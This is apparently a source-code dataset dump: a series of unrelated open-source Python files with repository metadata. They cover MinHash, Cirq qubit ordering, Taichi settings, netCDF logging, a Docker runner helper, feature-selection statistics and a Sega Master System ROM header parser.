'materials': [],
},
],
})
assert sorted(model.courses) == [
'2017/multi-year', '2019/single-session', 'courses/minimal',
]
assert sorted(model.self_study_courses) == ['courses/minimal']
course_2017 = model.courses['2017/multi-year']
assert course_2017.start_date.year == 2017
assert course_2017.end_date.year == 2019
assert sorted(model.run_years) == [2017, 2018, 2019]
for year in 2017, 2018:
assert model.run_years[year] == {'2017/multi-year': course_2017}
assert model.run_years[2019] == {
'2017/multi-year': course_2017,
'2019/single-session': course_2019,
}
assert_yaml_dump(models.dump(model), 'run-years/root.yml')
for year, run_year in model.run_years.items():
assert_yaml_dump(models.dump(run_year), f'run-years/{year}.yml')
| 32.164179 | 78 | 0.647486 |
24e1994095a6f8b720c4accb8a4cee07a5967176 | 73 | py | Python | code_stats/utils/__init__.py | abhinavshaw1993/code-stat | b98dede12dc01464938f1d8eb21b8219501239fc | [
"MIT"
] | 4 | 2019-08-23T00:53:12.000Z | 2020-01-16T06:25:43.000Z | code_stats/utils/__init__.py | abhinavshaw1993/code-stats | b98dede12dc01464938f1d8eb21b8219501239fc | [
"MIT"
] | null | null | null | code_stats/utils/__init__.py | abhinavshaw1993/code-stats | b98dede12dc01464938f1d8eb21b8219501239fc | [
"MIT"
] | null | null | null | __all__ = ['files_and_folders_utils', 'conversion_utils', 'print_utils']
| 36.5 | 72 | 0.780822 |
a21fe04b4f7a7e7082b7b0902977d755856ec415 | 606 | py | Python | python/docker_runner.py | spawnfest/metaparticler | 8dd17ab4fa76af0cd9eb6198fa02de18461236dd | [
"MIT"
] | 1 | 2018-11-02T14:40:31.000Z | 2018-11-02T14:40:31.000Z | python/docker_runner.py | spawnfest/metaparticler | 8dd17ab4fa76af0cd9eb6198fa02de18461236dd | [
"MIT"
] | null | null | null | python/docker_runner.py | spawnfest/metaparticler | 8dd17ab4fa76af0cd9eb6198fa02de18461236dd | [
"MIT"
] | null | null | null | import os
def ports(options):
try:
port_string = ""
print(options['ports'])
for i in options['ports']:
port_string += " -p {}:{}".format(i, i)
return port_string
except KeyError:
return ' '
def run(img, name, options):
# Launch docker container
os.system('docker run --rm --name {} {} -d {}'.format(
name,
ports(options),
img
))
# Attach to logs
os.system('docker logs -f {}'.format(name))
def cancel(name):
os.system('docker kill {}'.format(name))
os.system('docker rm {}'.format(name))
| 20.896552 | 58 | 0.539604 |
5d31b3b576ed84c8457806eca29b23c465e16325 | 1,523 | py | Python | pipeline/tests/core/flow/test_converge_gateway.py | sdgdsffdsfff/bk-sops-tencent | e8aff91f822e79031e12b0f66943830f44ced506 | [
"Apache-2.0"
] | 1 | 2020-09-24T07:39:16.000Z | 2020-09-24T07:39:16.000Z | pipeline/tests/core/flow/test_converge_gateway.py | sdgdsffdsfff/bk-sops-tencent | e8aff91f822e79031e12b0f66943830f44ced506 | [
"Apache-2.0"
] | 5 | 2021-02-08T20:46:54.000Z | 2021-06-10T22:54:45.000Z | pipeline/tests/core/flow/test_converge_gateway.py | sdgdsffdsfff/bk-sops-tencent | e8aff91f822e79031e12b0f66943830f44ced506 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from django.test import TestCase
from pipeline.core.flow.base import FlowNode, SequenceFlow
from pipeline.core.flow.gateway import Gateway, ConvergeGateway, ParallelGateway
class TestConvergeGateway(TestCase):
def test_converge_gateway(self):
gw_id = '1'
cvg_gateway = ConvergeGateway(gw_id)
self.assertTrue(isinstance(cvg_gateway, FlowNode))
self.assertTrue(isinstance(cvg_gateway, Gateway))
def test_next(self):
cvg_gateway = ConvergeGateway('1')
parallel_gateway = ParallelGateway('2', 'cvg')
out_flow = SequenceFlow('flow', cvg_gateway, parallel_gateway)
cvg_gateway.outgoing.add_flow(out_flow)
parallel_gateway.incoming.add_flow(out_flow)
self.assertEqual(parallel_gateway, cvg_gateway.next())
| 46.151515 | 115 | 0.759685 |
6d2bcf759d600009b1afab03432f4f2686f1fae9 | 2,421 | py | Python | pspec/logData.py | JoyMonteiro/parSPectral | 866eebc29e8b0df749131d20dbcafaee321079b3 | [
"BSD-3-Clause"
] | 2 | 2015-03-25T10:35:47.000Z | 2017-10-17T08:51:48.000Z | pspec/logData.py | JoyMonteiro/parSPectral | 866eebc29e8b0df749131d20dbcafaee321079b3 | [
"BSD-3-Clause"
] | null | null | null | pspec/logData.py | JoyMonteiro/parSPectral | 866eebc29e8b0df749131d20dbcafaee321079b3 | [
"BSD-3-Clause"
] | 1 | 2015-03-25T10:35:49.000Z | 2015-03-25T10:35:49.000Z | from netCDF4 import Dataset;
class logData(object):
"""
This class is a wrapper over the netCDF4 library to simplify
writing fields to a nc file
"""
def __init__(self, filename, fieldnames, dimNames, dims, cords, time_step, currTime=0, \
overwrite=False):
assert len(dimNames) == len(dims), \
"number of dimensions must match dimension names";
self.name = filename;
self.fields = fieldnames;
self.dims = dims;
self.currTime = currTime;
self.time_step = time_step
self.ii = 0
self.lats = cords[0]
self.lons = cords[1]
self.ncFile = Dataset(filename, 'w', clobber=overwrite)
# create a time dimension
if 'time' not in dimNames:
self.ncFile.createDimension('time', None);
# Create dimensions
for i in range(len(dims)):
self.ncFile.createDimension(dimNames[i], dims[i]);
# Create variables
self.ncFile.createVariable('time', 'f4', ('time',))
for i in range(len(fieldnames)):
self.ncFile.createVariable(fieldnames[i],'f8', \
self.ncFile.dimensions.keys());
self.ncFile.createVariable('latitude', 'f8', (dimNames[0],))
self.ncFile.createVariable('longitude', 'f8', (dimNames[1],))
self.ncFile.variables['latitude'][:] = self.lats
self.ncFile.variables['longitude'][:] = self.lons
self.ncFile.description = 'Simulation data';
print 'Created file ' + filename;
def writeData(self, fields):
assert len(fields) == len(self.fields), \
"all fields must be written at the same time.";
j = self.ii
t = self.currTime
print 'Writing data at time: ', t;
variable = self.ncFile.variables.keys();
variable.remove('time')
variable.remove('latitude')
variable.remove('longitude')
self.ncFile.variables['time'][j] = t
for i in range(len(variable)):
temp = self.ncFile.variables[variable[i]];
temp[j,:] = fields[i];
self.currTime += self.time_step/(24*3600.)
self.ii +=1
def finishLogging(self):
print 'Finished logging data to ', self.name;
print 'number of time steps stored: ', \
len(self.ncFile.variables['time']);
self.ncFile.close();
| 23.970297 | 92 | 0.577447 |
621a0b187dad1e9191e10f0847749cd1d9f6fc87 | 8,905 | py | Python | datasketch/minhash.py | yrik/datasketch | 82d9639bc0011932a952bbae1d4b5bd5ac03c7c8 | [
"MIT"
] | null | null | null | datasketch/minhash.py | yrik/datasketch | 82d9639bc0011932a952bbae1d4b5bd5ac03c7c8 | [
"MIT"
] | null | null | null | datasketch/minhash.py | yrik/datasketch | 82d9639bc0011932a952bbae1d4b5bd5ac03c7c8 | [
"MIT"
] | null | null | null | import random, copy, struct
from hashlib import sha1
import numpy as np
# The size of a hash value in number of bytes
hashvalue_byte_size = len(bytes(np.int64(42).data))
# http://en.wikipedia.org/wiki/Mersenne_prime
_mersenne_prime = (1 << 61) - 1
_max_hash = (1 << 32) - 1
_hash_range = (1 << 32)
class MinHash(object):
'''MinHash is a probabilistic data structure for computing
`Jaccard similarity`_ between sets.
Args:
num_perm (int, optional): Number of random permutation functions.
It will be ignored if `hashvalues` is not None.
seed (int, optional): The random seed controls the set of random
permutation functions generated for this MinHash.
hashobj (optional): The hash function used by this MinHash.
It must implements
the `digest()` method similar to hashlib_ hash functions, such
as `hashlib.sha1`.
hashvalues (`numpy.array` or `list`, optional): The hash values is
the internal state of the MinHash. It can be specified for faster
initialization using the existing state from another MinHash.
permutations (optional): The permutation function parameters. This argument
can be specified for faster initialization using the existing
state from another MinHash.
Note:
To save memory usage, consider using :class:`datasketch.LeanMinHash`.
Note:
Since version 1.1.1, MinHash will only support serialization using
`pickle`_. ``serialize`` and ``deserialize`` methods are removed,
and are supported in :class:`datasketch.LeanMinHash` instead.
MinHash serialized before version 1.1.1 cannot be deserialized properly
in newer versions (`need to migrate? <https://github.com/ekzhu/datasketch/issues/18>`_).
Note:
Since version 1.1.3, MinHash uses Numpy's random number generator
instead of Python's built-in random package. This change makes the
hash values consistent across different Python versions.
The side-effect is that now MinHash created before version 1.1.3 won't
work (i.e., ``jaccard``, ``merge`` and ``union``)
with those created after.
.. _`Jaccard similarity`: https://en.wikipedia.org/wiki/Jaccard_index
.. _hashlib: https://docs.python.org/3.5/library/hashlib.html
.. _`pickle`: https://docs.python.org/3/library/pickle.html
'''
def __init__(self, num_perm=128, seed=1, hashobj=sha1,
hashvalues=None, permutations=None):
if hashvalues is not None:
num_perm = len(hashvalues)
if num_perm > _hash_range:
# Because 1) we don't want the size to be too large, and
# 2) we are using 4 bytes to store the size value
raise ValueError("Cannot have more than %d number of\
permutation functions" % _hash_range)
self.seed = seed
self.hashobj = hashobj
# Initialize hash values
if hashvalues is not None:
self.hashvalues = self._parse_hashvalues(hashvalues)
else:
self.hashvalues = self._init_hashvalues(num_perm)
# Initalize permutation function parameters
if permutations is not None:
self.permutations = permutations
else:
generator = np.random.RandomState(self.seed)
# Create parameters for a random bijective permutation function
# that maps a 32-bit hash value to another 32-bit hash value.
# http://en.wikipedia.org/wiki/Universal_hashing
self.permutations = np.array([(generator.randint(1, _mersenne_prime, dtype=np.uint64),
generator.randint(0, _mersenne_prime, dtype=np.uint64))
for _ in range(num_perm)], dtype=np.uint64).T
if len(self) != len(self.permutations[0]):
raise ValueError("Numbers of hash values and permutations mismatch")
def _init_hashvalues(self, num_perm):
return np.ones(num_perm, dtype=np.uint64)*_max_hash
def _parse_hashvalues(self, hashvalues):
return np.array(hashvalues, dtype=np.uint64)
def update(self, b):
'''Update this MinHash with a new value.
Args:
b (bytes): The value of type `bytes`.
Example:
To update with a new string value:
.. code-block:: python
minhash.update("new value".encode('utf-8'))
'''
hv = struct.unpack('<I', self.hashobj(b).digest()[:4])[0]
a, b = self.permutations
phv = np.bitwise_and((a * hv + b) % _mersenne_prime, np.uint64(_max_hash))
self.hashvalues = np.minimum(phv, self.hashvalues)
def jaccard(self, other):
'''Estimate the `Jaccard similarity`_ (resemblance) between the sets
represented by this MinHash and the other.
Args:
other (datasketch.MinHash): The other MinHash.
Returns:
float: The Jaccard similarity, which is between 0.0 and 1.0.
'''
if other.seed != self.seed:
raise ValueError("Cannot compute Jaccard given MinHash with\
different seeds")
if len(self) != len(other):
raise ValueError("Cannot compute Jaccard given MinHash with\
different numbers of permutation functions")
return np.float(np.count_nonzero(self.hashvalues==other.hashvalues)) /\
np.float(len(self))
def count(self):
'''Estimate the cardinality count based on the technique described in
`this paper <http://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=365694>`_.
Returns:
int: The estimated cardinality of the set represented by this MinHash.
'''
k = len(self)
return np.float(k) / np.sum(self.hashvalues / np.float(_max_hash)) - 1.0
def merge(self, other):
'''Merge the other MinHash with this one, making this one the union
of both.
Args:
other (datasketch.MinHash): The other MinHash.
'''
if other.seed != self.seed:
raise ValueError("Cannot merge MinHash with\
different seeds")
if len(self) != len(other):
raise ValueError("Cannot merge MinHash with\
different numbers of permutation functions")
self.hashvalues = np.minimum(other.hashvalues, self.hashvalues)
def digest(self):
'''Export the hash values, which is the internal state of the
MinHash.
Returns:
numpy.array: The hash values which is a Numpy array.
'''
return copy.copy(self.hashvalues)
def is_empty(self):
'''
Returns:
bool: If the current MinHash is empty - at the state of just
initialized.
'''
if np.any(self.hashvalues != _max_hash):
return False
return True
def clear(self):
'''
Clear the current state of the MinHash.
All hash values are reset.
'''
self.hashvalues = self._init_hashvalues(len(self))
def copy(self):
'''
:returns: datasketch.MinHash -- A copy of this MinHash by exporting its state.
'''
return MinHash(seed=self.seed, hashvalues=self.digest(),
permutations=self.permutations)
def __len__(self):
'''
:returns: int -- The number of hash values.
'''
return len(self.hashvalues)
def __eq__(self, other):
'''
:returns: bool -- If their seeds and hash values are both equal then two are equivalent.
'''
return self.seed == other.seed and \
np.array_equal(self.hashvalues, other.hashvalues)
@classmethod
def union(cls, *mhs):
'''Create a MinHash which is the union of the MinHash objects passed as arguments.
Args:
*mhs: The MinHash objects to be united. The argument list length is variable,
but must be at least 2.
Returns:
datasketch.MinHash: A new union MinHash.
'''
if len(mhs) < 2:
raise ValueError("Cannot union less than 2 MinHash")
num_perm = len(mhs[0])
seed = mhs[0].seed
if any((seed != m.seed or num_perm != len(m)) for m in mhs):
raise ValueError("The unioning MinHash must have the\
same seed and number of permutation functions")
hashvalues = np.minimum.reduce([m.hashvalues for m in mhs])
permutations = mhs[0].permutations
return cls(num_perm=num_perm, seed=seed, hashvalues=hashvalues,
permutations=permutations)
| 40.112613 | 98 | 0.606513 |
7383abbf1008965769b81d3d65404d0801abaa1d | 223 | py | Python | src/028-number-spiral-diagonals/python/solver.py | xfbs/ProjectEulerRust | e26768c56ff87b029cb2a02f56dc5cd32e1f7c87 | [
"MIT"
] | 1 | 2018-01-26T21:18:12.000Z | 2018-01-26T21:18:12.000Z | src/028-number-spiral-diagonals/python/solver.py | xfbs/ProjectEulerRust | e26768c56ff87b029cb2a02f56dc5cd32e1f7c87 | [
"MIT"
] | 3 | 2017-12-09T14:49:30.000Z | 2017-12-09T14:59:39.000Z | src/028-number-spiral-diagonals/python/solver.py | xfbs/ProjectEulerRust | e26768c56ff87b029cb2a02f56dc5cd32e1f7c87 | [
"MIT"
] | null | null | null | def solve(m):
sum = 1
cur = 1
for ring in range(2, m, 2):
cur += ring
sum += cur
cur += ring
sum += cur
cur += ring
sum += cur
cur += ring
sum += cur
return sum
| 13.9375 | 30 | 0.426009 |
a55c71e60f3b74220c1de0e24e384deafa4f483d | 100 | py | Python | python/testData/inspections/PyCallingNonCallableInspection/concealer.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/inspections/PyCallingNonCallableInspection/concealer.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/inspections/PyCallingNonCallableInspection/concealer.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | def concealer():
class prog(object):
def __call__(self): pass
pr = prog()
pr()
| 14.285714 | 32 | 0.54 |
d92c9b2da2362b78299759788007df36c25fcfdf | 2,950 | py | Python | merrill_feature/feature_selection/func.py | edazizovv/merrill_feature | 59c7fd10e833a3376ee8ca3c631a73f0a2357c4f | [
"MIT"
] | null | null | null | merrill_feature/feature_selection/func.py | edazizovv/merrill_feature | 59c7fd10e833a3376ee8ca3c631a73f0a2357c4f | [
"MIT"
] | null | null | null | merrill_feature/feature_selection/func.py | edazizovv/merrill_feature | 59c7fd10e833a3376ee8ca3c631a73f0a2357c4f | [
"MIT"
] | null | null | null | #
#
import numpy
from scipy import stats
from sklearn.linear_model import LinearRegression
from sklearn.feature_selection import mutual_info_regression
#
#
def pearson(x, y):
p, _ = stats.pearsonr(x, y)
return p
class Correlated:
def __init__(self, model, kwargs):
self.model = model
self.kwargs = kwargs
def corr(self, x, y):
model = self.model(**self.kwargs)
model.fit(X=x.reshape(-1, 1), y=y)
y_hat = model.predict(X=x.reshape(-1, 1))
return pearson(x=y_hat, y=y)
def granger(x, y, n_lags=4):
recorded = []
X, Y = [], []
for j in range(n_lags):
X.append(x[j:-n_lags + j].reshape(-1, 1))
Y.append(y[j:-n_lags + j].reshape(-1, 1))
y_ = y[n_lags:]
done = False
x_mask = [True] * n_lags
x_codes = numpy.array(list(range(n_lags)))
y_mask = [True] * n_lags
y_codes = numpy.array(list(range(n_lags)))
while not done:
# build an ols model
Z = numpy.concatenate(X + Y, axis=1)[:, x_mask + y_mask]
model = LinearRegression()
model.fit(X=Z, y=y_)
params = numpy.append(model.intercept_, model.coef_)
predictions = model.predict(Z)
# t-testing
Z_extended = numpy.append(numpy.ones(shape=(Z.shape[0], 1)), Z, axis=1)
mse = ((y_ - predictions) ** 2).sum() / (Z_extended.shape[0] - Z_extended.shape[1])
params_variance = mse * (numpy.linalg.inv(numpy.dot(Z_extended.T, Z_extended)).diagonal())
params_std = numpy.sqrt(params_variance)
params_standardized = params / params_std
t_test_p_values = [2 * (1 - stats.t.cdf(numpy.abs(ps), (Z_extended.shape[0] - Z_extended.shape[1])))
for ps in params_standardized]
# f-testing
r_squared = model.score(X=Z, y=y_)
n = Z.shape[0]
k = Z.shape[1] + 1
f_statistic_value = (r_squared / (1 - r_squared)) * ((n - k - 1) / k)
f_test_p_values = 1 - stats.f(k - 1, n - k).cdf(f_statistic_value)
recorded.append(numpy.min([f_test_p_values] + t_test_p_values))
t_test_p_values_max = numpy.array(t_test_p_values).argmax()
if t_test_p_values_max < numpy.array(x_mask).sum():
x_mask[x_codes[x_mask][t_test_p_values_max]] = False
else:
y_mask[y_codes[y_mask][t_test_p_values_max - numpy.array(x_mask).sum()]] = False
if numpy.array(x_mask).sum() == 0:
done = True
min_result = 1 - numpy.min(recorded)
return min_result
def mutual(x, y):
m = mutual_info_regression(X=x.reshape(-1, 1), y=y)[0]
return m
def ks(x, y):
s, _ = stats.ks_2samp(data1=x, data2=y)
return 1 - s
def kl(x, y):
x_, _ = numpy.histogram(x, density=True)
y_, _ = numpy.histogram(y, density=True)
l = stats.entropy(pk=x_, qk=y_)
return 1 - l
def cross(x, y):
o = numpy.correlate(a=x, v=y)[0]
return o
| 23.98374 | 108 | 0.592203 |
a5048c7aafdab0990735956dcc21d9620f7ff5d6 | 5,665 | py | Python | cirq-core/cirq/ops/qubit_order.py | peterse/Cirq | 31daa9410a0e1e1ac3da38109aa8ce3a15aed17b | [
"Apache-2.0"
] | 3,326 | 2018-07-18T23:17:21.000Z | 2022-03-29T22:28:24.000Z | cirq-core/cirq/ops/qubit_order.py | peterse/Cirq | 31daa9410a0e1e1ac3da38109aa8ce3a15aed17b | [
"Apache-2.0"
] | 3,443 | 2018-07-18T21:07:28.000Z | 2022-03-31T20:23:21.000Z | cirq-core/cirq/ops/qubit_order.py | peterse/Cirq | 31daa9410a0e1e1ac3da38109aa8ce3a15aed17b | [
"Apache-2.0"
] | 865 | 2018-07-18T23:30:24.000Z | 2022-03-30T11:43:23.000Z | # Copyright 2018 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import (
Any,
Callable,
Iterable,
Optional,
Tuple,
TypeVar,
TYPE_CHECKING,
)
from cirq.ops import raw_types
if TYPE_CHECKING:
from cirq.ops import qubit_order_or_list
TInternalQubit = TypeVar('TInternalQubit')
TExternalQubit = TypeVar('TExternalQubit')
class QubitOrder:
"""Defines the kronecker product order of qubits."""
def __init__(
self, explicit_func: Callable[[Iterable[raw_types.Qid]], Tuple[raw_types.Qid, ...]]
) -> None:
self._explicit_func = explicit_func
DEFAULT = None # type: QubitOrder
"""A basis that orders qubits in the same way that calling `sorted` does.
Specifically, qubits are ordered first by their type name and then by
whatever comparison value qubits of a given type provide (e.g. for LineQubit
it is the x coordinate of the qubit).
"""
# TODO(#3388) Add documentation for Raises.
# pylint: disable=missing-raises-doc
@staticmethod
def explicit(
fixed_qubits: Iterable[raw_types.Qid], fallback: Optional['QubitOrder'] = None
) -> 'QubitOrder':
"""A basis that contains exactly the given qubits in the given order.
Args:
fixed_qubits: The qubits in basis order.
fallback: A fallback order to use for extra qubits not in the
fixed_qubits list. Extra qubits will always come after the
fixed_qubits, but will be ordered based on the fallback. If no
fallback is specified, a ValueError is raised when extra qubits
are specified.
Returns:
A Basis instance that forces the given qubits in the given order.
"""
result = tuple(fixed_qubits)
if len(set(result)) < len(result):
raise ValueError(f'Qubits appear in fixed_order twice: {result}.')
def func(qubits):
remaining = set(qubits) - set(result)
if not remaining:
return result
if not fallback:
raise ValueError(f'Unexpected extra qubits: {remaining}.')
return result + fallback.order_for(remaining)
return QubitOrder(func)
# pylint: enable=missing-raises-doc
@staticmethod
def sorted_by(key: Callable[[raw_types.Qid], Any]) -> 'QubitOrder':
"""A basis that orders qubits ascending based on a key function.
Args:
key: A function that takes a qubit and returns a key value. The
basis will be ordered ascending according to these key values.
Returns:
A basis that orders qubits ascending based on a key function.
"""
return QubitOrder(lambda qubits: tuple(sorted(qubits, key=key)))
def order_for(self, qubits: Iterable[raw_types.Qid]) -> Tuple[raw_types.Qid, ...]:
"""Returns a qubit tuple ordered corresponding to the basis.
Args:
qubits: Qubits that should be included in the basis. (Additional
qubits may be added into the output by the basis.)
Returns:
A tuple of qubits in the same order that their single-qubit
matrices would be passed into `np.kron` when producing a matrix for
the entire system.
"""
return self._explicit_func(qubits)
# TODO(#3388) Add documentation for Raises.
# pylint: disable=missing-raises-doc
@staticmethod
def as_qubit_order(val: 'qubit_order_or_list.QubitOrderOrList') -> 'QubitOrder':
"""Converts a value into a basis.
Args:
val: An iterable or a basis.
Returns:
The basis implied by the value.
"""
if isinstance(val, Iterable):
return QubitOrder.explicit(val)
if isinstance(val, QubitOrder):
return val
raise ValueError(f"Don't know how to interpret <{val}> as a Basis.")
# pylint: enable=missing-raises-doc
def map(
self,
internalize: Callable[[TExternalQubit], TInternalQubit],
externalize: Callable[[TInternalQubit], TExternalQubit],
) -> 'QubitOrder':
"""Transforms the Basis so that it applies to wrapped qubits.
Args:
externalize: Converts an internal qubit understood by the underlying
basis into an external qubit understood by the caller.
internalize: Converts an external qubit understood by the caller
into an internal qubit understood by the underlying basis.
Returns:
A basis that transforms qubits understood by the caller into qubits
understood by an underlying basis, uses that to order the qubits,
then wraps the ordered qubits back up for the caller.
"""
def func(qubits):
unwrapped_qubits = [internalize(q) for q in qubits]
unwrapped_result = self.order_for(unwrapped_qubits)
return tuple(externalize(q) for q in unwrapped_result)
return QubitOrder(func)
QubitOrder.DEFAULT = QubitOrder.sorted_by(lambda v: v)
| 35.186335 | 91 | 0.649956 |
7e34817590fa794140696edba14e330853fbe0d4 | 2,660 | py | Python | python/taichi/core/settings.py | 447983454/taichi | 2bfbca88b2d8cb1a070da9a40c5422c99b23fc2f | [
"MIT"
] | 2 | 2020-10-22T14:57:47.000Z | 2020-10-24T07:30:47.000Z | python/taichi/core/settings.py | SingleFYD/taichi | cdff76dd529e7c1a41b219b44712f0ab0584277a | [
"MIT"
] | 3 | 2020-08-24T09:07:15.000Z | 2020-08-24T09:18:29.000Z | python/taichi/core/settings.py | SingleFYD/taichi | cdff76dd529e7c1a41b219b44712f0ab0584277a | [
"MIT"
] | 1 | 2020-09-29T17:56:48.000Z | 2020-09-29T17:56:48.000Z | import os
import platform
import multiprocessing
default_num_threads = multiprocessing.cpu_count()
def get_num_cores():
return os.environ.get('TAICHI_NUM_THREADS', default_num_threads)
def get_os_name():
name = platform.platform()
# in python 3.8, platform.platform() uses mac_ver() on macOS
# it will return 'macOS-XXXX' instead of 'Darwin-XXXX'
if name.lower().startswith('darwin') or name.lower().startswith('macos'):
return 'osx'
elif name.lower().startswith('windows'):
return 'win'
elif name.lower().startswith('linux'):
return 'linux'
assert False, "Unknown platform name %s" % name
def get_directory(dir):
return os.path.join(get_repo_directory(), *dir.split('/'))
def get_repo_directory():
if 'TAICHI_REPO_DIR' not in os.environ:
repo_dir = os.path.join(os.environ.get('HOME'), ".taichi")
else:
repo_dir = os.environ.get('TAICHI_REPO_DIR')
if not os.path.exists(repo_dir):
raise ValueError(f"TAICHI_REPO_DIR [{repo_dir}] does not exist.")
return repo_dir
def get_project_directory(project=None):
if project:
return os.path.join(get_project_directory(), project)
else:
return os.path.join(get_repo_directory(), 'projects')
def get_runtime_directory():
bin_rel_path = ['external', 'lib']
return os.environ.get('TAICHI_BIN_DIR',
os.path.join(get_repo_directory(), *bin_rel_path))
def get_build_directory():
bin_rel_path = ['build']
return os.environ.get('TAICHI_BIN_DIR',
os.path.join(get_repo_directory(), *bin_rel_path))
def get_bin_directory():
if get_os_name() == 'win':
# for the dlls
bin_rel_path = ['runtimes']
else:
bin_rel_path = ['build']
return os.path.join(get_repo_directory(), *bin_rel_path)
def get_output_directory():
return os.environ.get('TAICHI_OUTPUT_DIR',
os.path.join(get_repo_directory(), 'outputs'))
def get_output_path(path, create=False):
path = os.path.join(get_output_directory(), path)
if create:
os.makedirs(path, exist_ok=True)
return path
def get_asset_directory():
asset_dir = os.environ.get('TAICHI_ASSET_DIR', '').strip()
if asset_dir == '':
return os.path.join(get_repo_directory(), 'assets')
else:
return asset_dir
def get_asset_path(path, *args):
return os.path.join(get_asset_directory(), path, *args)
__all__ = [
'get_output_directory',
'get_build_directory',
'get_bin_directory',
'get_repo_directory',
'get_runtime_directory',
'get_os_name',
]
| 26.868687 | 77 | 0.658647 |
ae72a700f8ebd6fa862d53db0f000af609980bcc | 7,367 | py | Python | models/pyrominfo/mastersystem.py | tiradoe/dgen-gtk | 6de074f1777dfb2acc1d5c9becbcdec244a85c59 | [
"MIT"
] | null | null | null | models/pyrominfo/mastersystem.py | tiradoe/dgen-gtk | 6de074f1777dfb2acc1d5c9becbcdec244a85c59 | [
"MIT"
] | 1 | 2019-03-21T06:07:00.000Z | 2019-03-21T06:07:00.000Z | models/pyrominfo/mastersystem.py | tiradoe/dgen-gtk | 6de074f1777dfb2acc1d5c9becbcdec244a85c59 | [
"MIT"
] | null | null | null | # Copyright (C) 2013 Garrett Brown
# See Copyright Notice in rominfo.py
from .rominfo import RomInfoParser
class MasterSystemParser(RomInfoParser):
"""
Parse a Sega Master System image. Valid extensions are sms, gg, sg (SG-1000 ROMs).
TODO: Should we support SG-1000 ROMs?
Sega Master System header references and related source code:
* http://www.smspower.org/Development/ROMHeader
* http://www.smspower.org/Development/SDSCHeader
"""
def getValidExtensions(self):
return ["sms", "gg", "sg"]
def parse(self, filename):
props = {}
with open(filename, "rb") as f:
data = bytearray(f.read())
# First header check is at 0x1FF0, so we clearly need at least this much data
if len(data) >= 0x2000:
props = self.parseBuffer(data)
return props
def isValidData(self, data):
"""
Sniff out Master System ROM header. Note that some ROMs may use
custom text. Gensis Plus GX looks at addresses 0x1FF0, 0x3FF0, 0x7FF0.
Quite a few ROMs, including "Strider (UE) [!].sms", use address 0x81F0.
X-MAME 0.106 has code to check this address, but the code is commented out...
https://code.oregonstate.edu/svn/dsp_bd/uclinux-dist/trunk/user/games/xmame/xmame-0.106/mess/machine/sms.c
The SDSC tag was introduced in 2001 to provide a standard way to tag
homebrew software. This tag is used as a fallback test if TMR SEGA isn't
found.
"""
if any(data[offset : offset + 8] == b"TMR SEGA" for offset in [0x1ff0, 0x3ff0, 0x7ff0, 0x81f0]):
return True
if data[0x7fe0 : 0x7fe0 + 4] == b"SDSC":
return True
return False
def parseBuffer(self, data):
props = {}
# Find Master System header offset (see isValidData(), default to 0x7FF0)
offset = 0x7ff0
for off in 0x1ff0, 0x3ff0, 0x81f0:
if data[off : off + 8] == b"TMR SEGA":
offset = off
break
header = data[offset : offset + 0x10] # Only need 0x10 (16) bytes
if not header:
return props
# 7FF0-7FF7 - Magic word "TMR SEGA". Sometimes, this is customized as a "signature"
# along with the reserved space and checksum (thus invalidating the
# checksum). No names-in-headers lookup tables are maintained here,
# but the information from the header_id, reserved_word and
# checksum_ascii fields can be referenced against data gathered at:
# * http://www.smspower.org/Development/NamesInHeaders
# * http://www.smspower.org/forums/viewtopic.php?t=2407
props["header_id"] = self._sanitize(header[ : 8])
# 7FF8-7FF9 - Reserved space, usually 0x0000, 0xFFFF or 0x2020
props["reserved_word"] = self._sanitize(header[0x08 : 0x08 + 2])
# 7FFA-7FFB - Checksum, little endian
props["checksum"] = "%04X" % (header[0x0a] << 8 | header[0x0b])
# Also include checksum in ASCII. Some programmers, like Yuji Naka, use the
# reserved space and checksum as a signature (NAKA), so in this case KA is
# more convenient than 0x4B41. According to www.smspower.org, these signatures
# only seem to feature A-Z, 0-9 and /.
word = self._sanitize(header[0x0a : 0x0a + 2])
props["checksum_ascii"] = [c for c in word if 'A' <= c and c <= 'Z' or '0' <= c and c <= '9' or c == '/']
# 7FFC-7FFE.8 - Product code. The first 2 bytes are a Binary Coded Decimal
# representation of the last four digits of the product code.
# The high 4 bits of the next byte are a hexadecimal representation
# of any remaining digits of the product code.
props["code"] = "%02d%02X%02X" % (header[0x0e] >> 4, header[0x0d], header[0x0c])
# 7FFE.8 - Version. The low 4 bits give a version number
props["version"] = "%02X" % (header[0x0e] & 0x0f)
# 7FFF.8 - Region and system for which the cartridge is intended
r = (header[0x0f] >> 4)
props["console"] = "Sega Master System" if r in [3, 4] else "Game Gear" if r in [5, 6, 7] else ""
props["region"] = "Japan" if r in [3, 5] else "Export" if r in [4, 6] else "International" if r == 7 else ""
# 7FFF.8 - ROM size. Final 4 bits give the ROM size, some values are buggy.
# It is common for this value to be present even when the checksum is not.
# It is also common for it to indicate a ROM size smaller than the actual ROM
# size, perhaps to speed up the boot process by speeding up the checksum validation.
